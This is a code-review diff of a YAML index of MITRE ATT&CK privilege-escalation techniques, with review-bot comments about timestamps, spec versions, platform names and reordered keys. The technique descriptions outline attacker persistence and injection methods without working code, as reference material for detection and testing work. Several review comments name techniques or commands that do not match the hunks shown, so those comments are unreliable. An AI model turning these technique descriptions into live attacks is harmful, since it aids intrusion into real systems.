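Review bot: this hunk for T1547.006 is mostly a key reordering (top-level fields moved, and the `url` key inside every external reference moved from before `description` to after it), which buries the substantive changes: `modified` `2022-05-11` to `2024-09-12`, `x_mitre_attack_spec_version` `2.1.0` to `3.2.0`, the iDefense URL moved to https with its retrieval date updated to September 12, 2024, and `spec_version` dropped. A semantic comparison (load both versions of the object with a YAML parser and diff the parsed structures) would confirm that nothing else changed; the description and detection text in particular should be identical before and after. Separately, the command names in the description and detection text (`kextload`, `kextunload`, `modprobe`, `insmod`, `lsmod`, `rmmod`, `modinfo`) sit on their own lines without a `+` or `-` prefix, which suggests inline code markup around them was lost when the patch was rendered; verify that the block scalars in the actual file keep them inline.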
@@ -20584,7 +20898,7 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows/win32/api/winternl/nf-winternl-ntqueryinformationprocess
description: Microsoft. (2021, November 23). NtQueryInformationProcess function
(winternl.h). Retrieved February 4, 2022.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-22T15:47:33.915Z'
name: KernelCallbackTable
description: |-
Adversaries may abuse the KernelCallbackTable
of a process to hijack its execution flow in order to run their own payloads.(Citation: Lazarus APT January 2022)(Citation: FinFisher exposed ) The KernelCallbackTable
can be found in the Process Environment Block (PEB) and is initialized to an array of graphic functions available to a GUI process once user32.dll
is loaded.(Citation: Windows Process Injection KernelCallbackTable)
@@ -20610,12 +20924,10 @@ privilege-escalation:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053.006:
technique:
- modified: '2023-09-08T11:56:26.862Z'
+ modified: '2024-10-15T16:42:51.536Z'
name: 'Scheduled Task/Job: Systemd Timers'
description: |-
Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer
that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)
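Review bot: T1574.013 loses both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` here and nothing re-adds an attack spec version for it, unlike T1053.006 in the next hunk, which is bumped from `3.1.0` to `3.2.0`. If the intent is to normalise every object to `x_mitre_attack_spec_version: 3.2.0`, this object needs the key restored with that value; if dropping it is intentional, say so in the commit message.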
@@ -20693,9 +21005,8 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/systemd.1.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1053.006
atomic_tests: []
T1574:
@@ -20762,7 +21073,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1543.005:
technique:
@@ -20836,11 +21146,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1078:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:09:46.024Z'
name: Valid Accounts
description: |-
Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
@@ -20857,7 +21166,6 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: initial-access
- x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors:
- Syed Ummar Farooqh, McAfee
- Prasad Somasamudram, McAfee
@@ -20867,7 +21175,7 @@ privilege-escalation:
- Netskope
- Mark Wee
- Praetorian
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
Configure robust, consistent account activity audit policies across the enterprise and with externally accessible services.(Citation: TechNet Audit Policy) Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
@@ -20876,19 +21184,17 @@ privilege-escalation:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- Containers
- Network
- x_mitre_version: '2.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.7'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
- 'User Account: User Account Authentication'
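Review bot: the platform list loses 'Azure AD', 'Office 365' and 'Google Workspace' and gains 'Office Suite' and 'Identity Provider' (with the version bump to 2.7), so any index, filter or test selection keyed on the old platform names will silently stop matching T1078.004; confirm the per-platform indexes are regenerated from the same data and that nothing still references the removed names. The `x_mitre_modified_by_ref` removed in this hunk is only re-added further down the object, so on its own it reads as a deletion.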
@@ -20936,11 +21242,12 @@ privilege-escalation:
url: https://technet.microsoft.com/en-us/library/dn487457.aspx
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1055.012:
technique:
- modified: '2023-08-11T21:37:00.009Z'
+ modified: '2024-09-12T15:11:45.602Z'
name: 'Process Injection: Process Hollowing'
description: "Adversaries may inject malicious code into suspended and hollowed
processes in order to evade process-based defenses. Process hollowing is a
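Review bot: removing `spec_version: '2.1'` takes the STIX spec version off the object, and the same removal is repeated for every technique in this patch with nothing added in its place; if anything downstream validates or serialises these objects as STIX 2.1 it will need to tolerate the missing field or supply a default, so call this out in the PR description. The `x_mitre_attack_spec_version` bump from 3.1.0 to 3.2.0 and the re-added `x_mitre_modified_by_ref` look like the intended substantive change here.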
@@ -21008,23 +21315,22 @@ privilege-escalation:
Retrieved December 7, 2017.'
url: https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process
- source_name: Leitch Hollowing
- description: Leitch, J. (n.d.). Process Hollowing. Retrieved November 12,
- 2014.
- url: http://www.autosectools.com/process-hollowing.pdf
+ description: Leitch, J. (n.d.). Process Hollowing. Retrieved September 12,
+ 2024.
+ url: https://new.dc414.org/wp-content/uploads/2011/01/Process-Hollowing.pdf
- source_name: Mandiant Endpoint Evading 2019
description: 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on
the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.'
url: https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1055.012
atomic_tests: []
T1068:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2023-04-07T17:13:54.168Z'
name: Exploitation for Privilege Escalation
description: |-
Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
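Review bot: the `modified` timestamp for T1068 moves backwards, from 2023-10-31 to 2023-04-07, and the same happens to T1134.005, T1548.004, T1547.002, T1546.015, T1574.009, T1037.005, T1037.003, T1543.001, T1055.009, T1134, T1055.005, T1547.007, T1574.002, T1055.008 and T1037.001 further down; the old values all carry a `14:00:00.188Z` or `14:49:39.188Z` suffix while the new ones look like per-object upstream timestamps, so confirm the regeneration source is newer than the previous one rather than a stale bundle. For the Leitch 'Process Hollowing' reference, the replacement URL on new.dc414.org is a third-party mirror; a web.archive.org capture of the original, as used for the bencane reference later in this patch, would be the more durable citation.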
@@ -21087,11 +21393,10 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1546:
technique:
- modified: '2024-03-01T15:49:15.588Z'
+ modified: '2024-10-15T15:57:00.731Z'
name: Event Triggered Execution
description: "Adversaries may establish persistence and/or elevate privileges
using system mechanisms that trigger execution based on specific events. Various
@@ -21144,8 +21449,8 @@ privilege-escalation:
- Windows
- SaaS
- IaaS
- - Office 365
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Module: Module Load'
- 'WMI: WMI Creation'
@@ -21193,78 +21498,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546
atomic_tests: []
T1546.004:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Robert Wilson
- - Tony Lambert, Red Canary
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
- type: attack-pattern
- created: '2020-01-24T14:13:45.936Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1546.004
- url: https://attack.mitre.org/techniques/T1546/004
- - source_name: intezer-kaiji-malware
- url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
- description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
- turning to Golang. Retrieved December 17, 2020.'
- - source_name: bencane blog bashrc
- url: https://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
- description: Benjamin Cane. (2013, September 16). Understanding a little more
- about /etc/profile and /etc/bashrc. Retrieved February 25, 2021.
- - source_name: anomali-rocke-tactics
- url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
- description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
- Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
- December 17, 2020.
- - source_name: Linux manual bash invocation
- url: https://wiki.archlinux.org/index.php/Bash#Invocation
- description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
- - source_name: Tsunami
- url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
- description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
- Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
- - source_name: anomali-linux-rabbit
- url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
- description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
- Malware Out of a Hat. Retrieved December 17, 2020.
- - source_name: Magento
- url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
- description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
- Vector. Retrieved December 17, 2020.
- - source_name: ScriptingOSX zsh
- url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
- description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
- Files. Retrieved February 25, 2021.'
- - source_name: PersistentJXA_leopitt
- url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
- description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
- for macOS. Retrieved January 11, 2021.
- - source_name: code_persistence_zsh
- url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
- description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
- Retrieved January 11, 2021.
- - source_name: macOS MS office sandbox escape
- url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
- description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
- Retrieved August 20, 2021.
- - source_name: ESF_filemonitor
- url: https://objective-see.com/blog/blog_0x48.html
- description: Patrick Wardle. (2019, September 17). Writing a File Monitor
- with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-25T15:02:24.143Z'
name: 'Event Triggered Execution: .bash_profile .bashrc and .shrc'
description: "Adversaries may establish persistence through executing malicious
commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s
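Review bot: the block removed here (platforms, domains, contributors, id, type, created, created_by_ref, external_references and marking refs for T1546.004) is not deleted but re-emitted further down the object in a different key order, which buries the real changes in this technique: the bencane citation switches to a web.archive.org capture with a new retrieved date, `revoked: false` and `x_mitre_deprecated: false` appear, and `x_mitre_attack_spec_version` goes from 2.1.0 to 3.2.0. If the generator can emit keys in a stable order, the diff would show only those changes.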
@@ -21312,6 +21550,10 @@ privilege-escalation:
phase_name: privilege-escalation
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Robert Wilson
+ - Tony Lambert, Red Canary
+ x_mitre_deprecated: false
x_mitre_detection: "While users may customize their shell profile files, there
are only certain types of commands that typically appear in these files. Monitor
for abnormal commands such as execution of unknown programs, opening network
@@ -21322,9 +21564,13 @@ privilege-escalation:
events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor
most Linux and macOS systems, a list of file paths for valid shell options
available on a system are located in the /etc/shells
file.\n"
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
x_mitre_version: '2.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: Process Creation'
- 'File: File Creation'
@@ -21333,8 +21579,67 @@ privilege-escalation:
x_mitre_permissions_required:
- User
- Administrator
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--b63a34e8-0a61-4c97-a23b-bf8a2ed812e2
+ created: '2020-01-24T14:13:45.936Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1546/004
+ external_id: T1546.004
+ - source_name: anomali-linux-rabbit
+ description: Anomali Threat Research. (2018, December 6). Pulling Linux Rabbit/Rabbot
+ Malware Out of a Hat. Retrieved December 17, 2020.
+ url: https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat
+ - source_name: anomali-rocke-tactics
+ description: Anomali Threat Research. (2019, October 15). Illicit Cryptomining
+ Threat Actor Rocke Changes Tactics, Now More Difficult to Detect. Retrieved
+ December 17, 2020.
+ url: https://www.anomali.com/blog/illicit-cryptomining-threat-actor-rocke-changes-tactics-now-more-difficult-to-detect
+ - source_name: Linux manual bash invocation
+ description: ArchWiki. (2021, January 19). Bash. Retrieved February 25, 2021.
+ url: https://wiki.archlinux.org/index.php/Bash#Invocation
+ - source_name: ScriptingOSX zsh
+ description: 'Armin Briegel. (2019, June 5). Moving to zsh, part 2: Configuration
+ Files. Retrieved February 25, 2021.'
+ url: https://scriptingosx.com/2019/06/moving-to-zsh-part-2-configuration-files/
+ - source_name: bencane blog bashrc
+ description: Benjamin Cane. (2013, September 16). Understanding a little more
+ about /etc/profile and /etc/bashrc. Retrieved September 25, 2024.
+ url: https://web.archive.org/web/20220316014323/http://bencane.com/2013/09/16/understanding-a-little-more-about-etcprofile-and-etcbashrc/
+ - source_name: macOS MS office sandbox escape
+ description: Cedric Owens. (2021, May 22). macOS MS Office Sandbox Brain Dump.
+ Retrieved August 20, 2021.
+ url: https://cedowens.medium.com/macos-ms-office-sandbox-brain-dump-4509b5fed49a
+ - source_name: Magento
+ description: Cesar Anjos. (2018, May 31). Shell Logins as a Magento Reinfection
+ Vector. Retrieved December 17, 2020.
+ url: https://blog.sucuri.net/2018/05/shell-logins-as-a-magento-reinfection-vector.html
+ - source_name: Tsunami
+ description: Claud Xiao and Cong Zheng. (2017, April 6). New IoT/Linux Malware
+ Targets DVRs, Forms Botnet. Retrieved December 17, 2020.
+ url: https://unit42.paloaltonetworks.com/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/
+ - source_name: PersistentJXA_leopitt
+ description: Leo Pitt. (2020, August 6). Persistent JXA - A poor man's Powershell
+ for macOS. Retrieved January 11, 2021.
+ url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+ - source_name: code_persistence_zsh
+ description: Leo Pitt. (2020, November 11). Github - PersistentJXA/BashProfilePersist.js.
+ Retrieved January 11, 2021.
+ url: https://github.com/D00MFist/PersistentJXA/blob/master/BashProfilePersist.js
+ - source_name: ESF_filemonitor
+ description: Patrick Wardle. (2019, September 17). Writing a File Monitor
+ with Apple's Endpoint Security Framework. Retrieved December 17, 2020.
+ url: https://objective-see.com/blog/blog_0x48.html
+ - source_name: intezer-kaiji-malware
+ description: 'Paul Litvak. (2020, May 4). Kaiji: New Chinese Linux malware
+ turning to Golang. Retrieved December 17, 2020.'
+ url: https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1546.004
atomic_tests: []
T1134.005:
@@ -21380,7 +21685,7 @@ privilege-escalation:
description: Microsoft. (n.d.). Using DsAddSidHistory. Retrieved November
30, 2017.
source_name: Microsoft DsAddSidHistory
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-02-09T15:49:58.414Z'
name: 'Access Token Manipulation: SID-History Injection'
description: |-
Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. (Citation: Microsoft SID) An account can hold additional SIDs in the SID-History Active Directory attribute (Citation: Microsoft SID-History Attribute), allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).
@@ -21405,13 +21710,11 @@ privilege-escalation:
x_mitre_permissions_required:
- Administrator
- SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1134.005
atomic_tests: []
T1548.004:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-10-19T16:35:18.492Z'
name: Elevated Execution with Prompt
description: "Adversaries may leverage the AuthorizationExecuteWithPrivileges
API to escalate privileges by prompting the user for credentials.(Citation:
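Review bot: for T1134.005 this hunk drops `x_mitre_attack_spec_version: 2.1.0` together with `spec_version` and, unlike T1055.012 and T1546 above, no newer value is added back; the same happens to T1037.003, T1055.009, T1055.005 and T1055.008 below. If `x_mitre_attack_spec_version` is expected on every technique, these objects end up without it, so verify this against the upstream data rather than assuming it is a reorder.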
@@ -21491,7 +21794,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1547.002:
technique:
@@ -21527,7 +21829,7 @@ privilege-escalation:
Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)
Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location HKLM\SYSTEM\CurrentControlSet\Control\Lsa\
with the key value of "Authentication Packages"=<target binary>
. The binary will then be executed by the system when the authentication packages are loaded.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:29:36.291Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Authentication Package
x_mitre_detection: 'Monitor the Registry for changes to the LSA Registry keys.
@@ -21550,12 +21852,11 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.002
atomic_tests: []
T1546.015:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:34:29.402Z'
name: 'Event Triggered Execution: Component Object Model Hijacking'
description: "Adversaries may establish persistence by executing malicious content
triggered by hijacked references to Component Object Model (COM) objects.
@@ -21633,12 +21934,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.015
atomic_tests: []
T1574.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:35.788Z'
name: 'Hijack Execution Flow: Path Interception by Unquoted Path'
description: |-
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
@@ -21699,7 +21999,6 @@ privilege-escalation:
url: https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
identifier: T1574.009
atomic_tests: []
T1037.005:
@@ -21743,7 +22042,7 @@ privilege-escalation:
mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since
StartupItems run during the bootup phase of macOS, they will run as the elevated
root user."
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-20T16:43:21.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Boot or Logon Initialization Scripts: Startup Items'
x_mitre_detection: |-
@@ -21765,7 +22064,6 @@ privilege-escalation:
- Administrator
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.005
atomic_tests: []
T1078.002:
@@ -21846,7 +22144,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.003:
technique:
@@ -21869,7 +22166,7 @@ privilege-escalation:
description: Daniel Petri. (2009, January 8). Setting up a Logon Script through
Active Directory Users and Computers in Windows Server 2008. Retrieved November
15, 2019.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-24T23:45:25.625Z'
name: Network Logon Script
description: "Adversaries may use network logon scripts automatically executed
at logon initialization to establish persistence. Network logon scripts can
@@ -21899,12 +22196,10 @@ privilege-escalation:
- 'File: File Modification'
- 'Process: Process Creation'
- 'File: File Creation'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.010:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-21T12:33:45.568Z'
name: 'Event Triggered Execution: AppInit DLLs'
description: "Adversaries may establish persistence and/or elevate privileges
by executing malicious content triggered by AppInit DLLs loaded into processes.
@@ -21989,7 +22284,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.010
atomic_tests: []
T1546.002:
@@ -22054,7 +22348,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1546.002
atomic_tests: []
T1543.001:
@@ -22129,7 +22422,7 @@ privilege-escalation:
benign software. Launch Agents are created with user level privileges and
execute with user level permissions.(Citation: OSX Malware Detection)(Citation:
OceanLotus for OS X) "
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-21T16:13:00.598Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Create or Modify System Process: Launch Agent'
x_mitre_detection: "Monitor Launch Agent creation through additional plist files
@@ -22157,7 +22450,6 @@ privilege-escalation:
- User
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.001
atomic_tests: []
T1055.009:
@@ -22188,7 +22480,7 @@ privilege-escalation:
url: http://man7.org/linux/man-pages/man1/dd.1.html
description: Kerrisk, M. (2020, February 2). DD(1) User Commands. Retrieved
February 21, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-06-20T22:25:55.331Z'
name: Proc Memory
description: "Adversaries may inject malicious code into processes via the /proc
filesystem in order to evade process-based defenses as well as possibly elevate
@@ -22231,12 +22523,10 @@ privilege-escalation:
x_mitre_defense_bypassed:
- Application control
- Anti-virus
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1546.016:
technique:
- modified: '2024-04-12T02:23:44.583Z'
+ modified: '2024-04-28T15:52:44.332Z'
name: Installer Packages
description: |-
Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.(Citation: Installer Package Scripting Rich Trouton)
@@ -22253,7 +22543,7 @@ privilege-escalation:
phase_name: persistence
x_mitre_contributors:
- Brandon Dalton @PartyD0lphin
- - Alexander Rodchenko
+ - Rodchenko Aleksandr
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
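Review bot: the contributor rename here puts the surname first ('Rodchenko Aleksandr') while the earlier hunk for T1078.004 reverses 'Goldstein Menachem' into given-name-first order; as the index mirrors upstream ATT&CK contributor strings this is most likely what the source contains, but it is worth a quick check that the generator is not reordering name tokens.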
@@ -22312,7 +22602,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1037.004:
technique:
@@ -22394,12 +22683,11 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1037.004
atomic_tests: []
T1134:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-03-30T21:01:47.762Z'
name: Access Token Manipulation
description: |-
Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
@@ -22496,7 +22784,6 @@ privilege-escalation:
url: https://pentestlab.blog/2017/04/03/token-manipulation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
atomic_tests: []
T1543.002:
technique:
@@ -22610,7 +22897,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1543.002
atomic_tests: []
T1547.013:
@@ -22680,7 +22966,6 @@ privilege-escalation:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
